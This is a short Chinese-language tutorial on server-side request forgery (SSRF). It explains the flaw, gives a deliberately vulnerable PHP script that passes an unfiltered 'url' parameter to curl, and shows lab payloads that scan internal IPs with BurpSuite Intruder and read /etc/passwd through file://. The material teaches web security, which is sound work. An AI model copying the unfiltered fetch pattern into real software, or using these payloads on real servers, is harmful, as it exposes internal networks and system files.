我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!!
(1)SSRF漏洞: SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)
(1)漏洞成因: SSRF 形成的原因大都是由于服务端提供了从同网段下的其他服务器应用获取数据的功能且没有对目标地址做过滤与限制
。比如通过file://和http://等协议从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。
http://www.webtester.com/ssrf.php?url=http://www.exploit.cool/robots.txt
include 'init.php';
if ($_GET['url']) {
// Client
$url = $_GET['url'];
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_NOSIGNAL, 1);
curl_setopt($ch, CURLOPT_TIMEOUT_MS, 5000);
$data = curl_exec($ch);
$curl_errno = curl_errno($ch);
$curl_error = curl_error($ch);
curl_close($ch);
if ($curl_errno > 0) {
echo "cURL Error ($curl_errno): $curl_error\n";
} else {
echo "$data\n";
}
} else {
// Server
sleep(10);
echo "Done.";
}
?>
利用http://协议
【BurpSuite扫描目标服务器上所在网段的ip和端口】
浏览器访问:http://www.webtester.com/ssrf.php?url=http://192.168.97.130
,抓包拦截,送入Intruder模块爆破即可!!!
利用file://协议
【使用file协议读取靶机本地文件】
浏览器访问:http://www.webtester.com/ssrf.php?url=file:///etc/passwd
,如下图所示:
略
略